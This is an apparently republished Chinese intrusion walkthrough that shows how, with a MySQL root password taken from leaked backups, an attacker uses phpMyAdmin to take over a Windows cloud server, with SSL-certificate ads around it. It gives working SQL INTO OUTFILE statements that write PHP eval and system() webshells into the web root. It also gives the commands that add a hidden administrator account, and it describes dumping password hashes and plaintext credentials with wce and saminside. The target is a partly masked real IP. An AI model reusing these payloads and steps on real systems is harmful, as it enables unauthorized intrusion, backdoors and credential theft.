PhpMyadmin是如何利用Mysqlroot密碼獲取webshell的

本文主要給大家介紹PhpMyadmin是如何利用MySQL root密碼獲取webshell的，文章內(nèi)容都是筆者用心摘選和編輯的，具有一定的針對性，對大家的參考意義還是比較大的，下面跟筆者一起了解下PhpMyadmin是如何利用Mysql root密碼獲取webshell的吧。

漢陰ssl適用于網(wǎng)站、小程序/APP、API接口等需要進(jìn)行數(shù)據(jù)傳輸應(yīng)用場景，ssl證書未來市場廣闊！成為創(chuàng)新互聯(lián)的ssl證書銷售渠道，可以享受市場價格4-6折優(yōu)惠！如果有意向歡迎電話聯(lián)系或者加微信：18980820575（備注：SSL證書合作）期待與您的合作！

Simeon

   Phpmyadmin是一款著名的mysql在線管理系統(tǒng)，通過提供的mysql數(shù)據(jù)庫用戶賬號和密碼對所管理的數(shù)據(jù)庫實(shí)施操作。在***過程中，一旦獲取其mysql賬號和對應(yīng)的密碼，輕者獲取其賬號所管理數(shù)據(jù)庫，重者可以配合其它漏洞獲取webshell權(quán)限和系統(tǒng)權(quán)限。Root賬號及口令可以通過暴力破解，源代碼泄露等途徑獲取，本文主要就其root賬號獲取以及phpmyadmin的利用、如何導(dǎo)出webshell等進(jìn)行探討。

Mysql root賬號及密碼在phpmyadmin中的利用思路主要有以下幾個方面：

（1）獲取所有數(shù)據(jù)庫中敏感表中的內(nèi)容。例如涉及系統(tǒng)配置的表，涉及CMS管理的各種管理員表以及用戶賬號的表。通過這些表獲取管理員賬號和密碼，各種配置信息。

（2）獲取網(wǎng)站的真實(shí)物理路徑。網(wǎng)站的真實(shí)物理路徑主要用來導(dǎo)出webshell，其方法主要有程序報錯、phpinfo函數(shù)、程序配置表等。

（3）通過查詢語句直接將一句話后門導(dǎo)入到網(wǎng)站目錄或者phpmyadmin所在目錄。

（4）獲取webshell后，如果是windows系統(tǒng)則可以嘗試進(jìn)行提權(quán)。

（5）有些網(wǎng)站可能前期被***過，網(wǎng)站可能有webshell，特別是一句話后門，如果有后門則可以通過一句話后門暴力破解獲取。

（6）無法獲取網(wǎng)站的真實(shí)路徑情況下，則意味著無法直接導(dǎo)出一句話webshell，可以通過CMS系統(tǒng)管理賬號登錄系統(tǒng)后，尋找漏洞來突破，例如dedecms則可以通過破解管理員賬號后直接上傳文件來獲取webshell。

（7）如果目標(biāo)不僅僅是一個網(wǎng)站，則可以通過分析獲取的密碼信息對相鄰或者已知目標(biāo)系統(tǒng)進(jìn)行***利用，例如掃描SSH口令、Mysql口令等。

（8）很多提供phpmyadmin的網(wǎng)站往往會存在目錄泄露和代碼泄露等漏洞，通過泄露的代碼來獲取數(shù)據(jù)庫口令，審計(jì)泄露代碼獲取漏洞并利用。

（9）phpmyadmin某些版本存在遠(yuǎn)程執(zhí)行以及包含等漏洞，可以通過這些漏洞直接獲取webshell。

   下面是一個實(shí)際利用的實(shí)例。

1.對IP所在端口進(jìn)行全端口掃描

   在Nmap中輸入IP地址，選擇“Intense scan,all Tcp port”，掃描結(jié)果顯示該IP開放了135、1026、3306、3389、80等端口，詳細(xì)端口開放情況如圖1所示，在實(shí)際***過程中可以在瀏覽器中對逐個端口進(jìn)行一一訪問，當(dāng)然一些比較明顯的端口就不用測試了。有些云服務(wù)器為了提供多個服務(wù)，有時候會開放多個端口，端口越多意味著可以利用的漏洞也就越多。

                           

圖1端口開放情況

2.對IP地址進(jìn)行域名反查

   將該IP在域名反查網(wǎng)站中進(jìn)行查詢，如圖2所示，顯示該IP存在3個網(wǎng)站。

圖2域名反查

3.對網(wǎng)站IP進(jìn)行訪問

   在瀏覽器中直接輸入該IP進(jìn)行訪問，發(fā)下該IP下存在phpmyadmin目錄、源代碼、數(shù)據(jù)庫備份文件等，如圖3所示。其中可下載文件列表：

http://182.xx.xxx.16/mxsy_newzs.sql

http://182.xx.xxx.16/szcmsw.sql

http://182.xx.xxx.16/szcmsw11.sql

http://182.xx.xxx.16/hs.zip

http://182.xx.xxx.16/Z-BlogPHP_1_4_Deeplue_150101.zip

圖3 云服務(wù)器所在IP存在目錄泄露等漏洞

4.獲取數(shù)據(jù)庫口令

   分別下載網(wǎng)站泄露的壓縮文件和數(shù)據(jù)庫文件，下載文件后將壓縮文件進(jìn)行解壓，然后尋找數(shù)據(jù)庫配置文件。解壓hs.zip后，在其data目錄下的common.inc.php文件中獲取了其數(shù)據(jù)庫配置，如圖4所示，但很明顯該密碼不是真正的數(shù)據(jù)庫密碼，應(yīng)該是某一個cms的源代碼程序包。繼續(xù)對每一個泄露的目錄進(jìn)行訪問，發(fā)現(xiàn)szcms1目錄下還存rar文件，http://182.xx.xxx.16/szcms1/szcms.rar和http://182.xx.xxx.16/szcms1/szcms1.rar如圖5所示。將其下載后進(jìn)行解壓縮，成功找到數(shù)據(jù)庫配置文件。

圖4獲取數(shù)據(jù)庫配置文件內(nèi)容

圖5再次發(fā)現(xiàn)泄露源代碼壓縮文件

5.登錄phpmyadmin

   使用在前面szcms1.rar中獲取的root賬號密碼進(jìn)行登錄，如圖6所示成功登錄，可以看到該mysql數(shù)據(jù)庫中共有7個有用的數(shù)據(jù)庫。可以選擇數(shù)據(jù)庫，然后選擇“導(dǎo)出”，將指定數(shù)據(jù)庫導(dǎo)出到本地（傳說中的***，盡量別干?。?。

圖6登錄phpmyadmin

6.導(dǎo)出一句話后門到云服務(wù)器

   目前導(dǎo)出一句話后門的方法有以下幾種：

   （1）創(chuàng)建表方式

CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOTNULL );

INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES('<?php @eval($_POST[pass]);?>');

SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE'd:/www/exehack.php';

DROP TABLE IF EXISTS `darkmoon`;

    上面代碼是在mysql數(shù)據(jù)庫中創(chuàng)建darkmoon表，然后加入一個名字為darkmoon1的字段，并在darkmoon1的字段中插入一句話代碼，然后從darkmoon1字段里面導(dǎo)出一句話到網(wǎng)站的真實(shí)路徑“C:/WWW/szcms1/szcms/Public/”，最后就是刪除darkmoon這個表。

    注意：在使用以上代碼時必須選擇mysql數(shù)據(jù)庫，并在phpMyAdmin中選擇SQL，然后執(zhí)行以上代碼即可。需要修改的地方是網(wǎng)站的真實(shí)路徑和文件名稱“C:/WWW/szcms1/szcms/Public/ exehack.php”

（2）直接導(dǎo)出一句話后門文件

   select '<?php@eval($_POST[pass]);?>'INTO OUTFILE 'd:/www/p.php'

   如果顯示結(jié)果類似“您的 SQL 語句已成功運(yùn)行 ( 查詢花費(fèi) 0.0006 秒 )”表明后門文件生成成功。

（3）直接執(zhí)行命令權(quán)限的shell

select '<?php echo\'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTOOUTFILE 'd:/www/cmd.php'

該方法導(dǎo)出成功后可以直接執(zhí)行DOS命令，使用方法:www.xxx.com/cmd.php?cmd=(cmd=后面直接執(zhí)行dos命令)。

在本例中執(zhí)行導(dǎo)出腳本語句后，網(wǎng)站給掛了，訪問不了云服務(wù)器這比較郁悶，嘗試通過mysql數(shù)據(jù)庫客戶端連接工具“Navicat for MySQL”，新建一個連接，將ip地址等信息全部輸入“Navicat for MySQL”中，成功連接，如圖7說是。運(yùn)氣真好！

圖7使用Navicat forMySQL連接mysql數(shù)據(jù)庫

通過訪問http://182.xx.xxx.16/szcms1/szcms/Public/Home/p_w_picpaths/micro_r4_c2.png來獲取網(wǎng)站的真實(shí)物理路徑C:\WWW\szcms1\szcms\Tp\，如圖8所示。

圖8獲取真實(shí)路徑

然后在mysql數(shù)據(jù)庫中分別執(zhí)行：

CREATE TABLE`mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );

INSERT INTO`mysql`.`darkmoon` (`darkmoon1` ) VALUES ('<?php@eval($_POST[pass]);?>');

SELECT`darkmoon1` FROM `darkmoon` INTO OUTFILE 'C:/WWW/szcms1/szcms/Public/exehack.php';

DROP TABLE IFEXISTS `darkmoon`;

    對導(dǎo)出的webshell在網(wǎng)站進(jìn)行訪問測試，如圖9所示，如果沒有顯示錯誤，則表示可以運(yùn)行，在中國菜刀一句話后門管理中添加該地址直接獲取webshell，如圖10所示。

圖9通過目錄泄露漏洞查看文件是否導(dǎo)出成功

圖10獲取webshell

9.云服務(wù)器提權(quán)

  （1）wce直接獲取明文密碼失敗

通過中國菜刀隊(duì)遠(yuǎn)程終端命令，直接在其中執(zhí)行命令，執(zhí)行whoami命令顯示為系統(tǒng)權(quán)限，上傳wce64.exe并執(zhí)行“wce64 -w”獲取當(dāng)前登錄明文密碼，如圖11所示，結(jié)果未能獲取密碼，直接獲取明文密碼失敗。

圖11執(zhí)行命令

（2）直接添加管理員

   在前面的端口掃描中顯示該云服務(wù)器開啟了3389端口，既然webshell可以執(zhí)行命令，直接執(zhí)行“netuser temp temp2005 /add”和“ net localgroup administrators temp /add”命令添加一個管理員用戶temp，密碼為temp2005，如圖12所示成功添加temp用戶到管理員組中。

圖12添加temp用戶到管理員組

（3）登錄3389

    在本地打開mstsc.exe直接輸入用戶名和密碼進(jìn)行登錄，如圖13所示成功登錄該云服務(wù)器。

圖13成功登錄該云服務(wù)器

（4）獲取管理員密碼hash和明文

  登錄云服務(wù)器后，通過瀏覽器下載一個saminside程序，如圖14所示，直接獲取系統(tǒng)的hash值。將該哈希值導(dǎo)出到本地，通過ophcrack程序進(jìn)行破解。

圖14獲取系統(tǒng)hash值

   然后再次上傳一個wce64修改版本，免輸入一鍵獲取密碼，如圖15所示，成功獲取adminstrator的密碼“123321abc*”。

圖15獲取系統(tǒng)管理員密碼

看完以上關(guān)于PhpMyadmin是如何利用Mysql root密碼獲取webshell的，很多讀者朋友肯定多少有一定的了解，如需獲取更多的行業(yè)知識信息 ，可以持續(xù)關(guān)注我們的行業(yè)資訊欄目的。

文章題目：PhpMyadmin是如何利用Mysqlroot密碼獲取webshell的
本文地址：http://bm7419.com/article38/igsdsp.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供品牌網(wǎng)站設(shè)計(jì)、電子商務(wù)、網(wǎng)站導(dǎo)航、建站公司、App開發(fā)、標(biāo)簽優(yōu)化

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)